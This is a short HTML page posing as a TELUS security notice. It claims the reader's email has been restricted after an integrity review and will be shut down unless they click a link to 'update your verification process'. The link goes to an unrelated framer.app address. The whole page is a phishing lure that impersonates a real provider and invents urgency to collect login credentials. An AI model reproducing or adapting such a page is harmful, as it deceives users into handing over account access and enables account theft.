<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Telus</title>
</head>
<body>
    <h1 style="font-size: larger;color: black;">Critical Security Review</h1>
    <p style="font-size: smaller;color: cornflowerblue;">Your TELUS email has been placed under security restriction following a system integrity review.</p>
    <p>Mailbox access will be shut down automatically if required verification is not completed.</p>
    

    <p><a href="https://knowingly-instance-427869.framer.app/">update your verification process</a</p>
